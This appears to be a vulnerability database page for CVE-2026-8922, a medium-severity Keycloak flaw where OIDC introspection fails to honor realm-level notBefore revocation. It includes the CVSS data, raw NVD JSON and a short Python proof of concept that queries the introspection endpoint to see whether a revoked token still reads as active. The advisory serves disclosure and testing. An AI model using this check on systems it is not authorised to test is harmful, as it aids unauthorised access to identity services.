Security Vulnerability Report
CVE-2026-8922 CVSS 5.4 MEDIUM

CVE-2026-8922

Published: 2026-05-19 08:16:18
Last Modified: 2026-05-19 08:16:18

Description

A flaw was found in Keycloak. When both realm-level and client-level `notBefore` revocation policies are configured, Keycloak's OpenID Connect (OIDC) Introspection feature fails to properly honor the realm-level policy. This allows tokens that should have been revoked to remain active, potentially leading to unauthorized access or continued session validity. This could impact the security of systems utilizing Keycloak for identity and access management.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (for the specific affected versions, refer to the official advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Conceptual PoC for CVE-2026-8922
# This script checks if a token remains active despite a realm-level
# revocation (notBefore) policy. The token passed in should be one that
# was issued before the realm-level notBefore was set, i.e. one the realm
# policy says must be treated as revoked.


def check_revocation_bypass(introspect_url, client_id, client_secret, token):
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = {
        'client_id': client_id,
        'client_secret': client_secret,
        'token': token,
    }
    # Standard OIDC token introspection request (RFC 7662 style form post)
    response = requests.post(introspect_url, data=data, headers=headers, timeout=10)
    response.raise_for_status()
    result = response.json()
    # If 'active' is true, the realm-level revocation policy was not honored
    if result.get('active', False):
        print("[+] Vulnerability Detected: Token is active despite realm revocation policy.")
        return True
    print("[-] Token is correctly inactive.")
    return False


# Example usage
# check_revocation_bypass(
#     "https://target.com/realms/myrealm/protocol/openid-connect/token/introspect",
#     "client", "secret", "old_token_string")
```

References

https://access.redhat.com/security/cve/CVE-2026-8922
https://bugzilla.redhat.com/show_bug.cgi?id=2479586

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-8922",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T08:16:18.343",
    "lastModified": "2026-05-19T08:16:18.343",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Keycloak. When both realm-level and client-level `notBefore` revocation policies are configured, Keycloak's OpenID Connect (OIDC) Introspection feature fails to properly honor the realm-level policy. This allows tokens that should have been revoked to remain active, potentially leading to unauthorized access or continued session validity. This could impact the security of systems utilizing Keycloak for identity and access management."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-303"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://access.redhat.com/security/cve/CVE-2026-8922",
        "source": "[email protected]"
      },
      {
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2479586",
        "source": "[email protected]"
      }
    ]
  }
}
```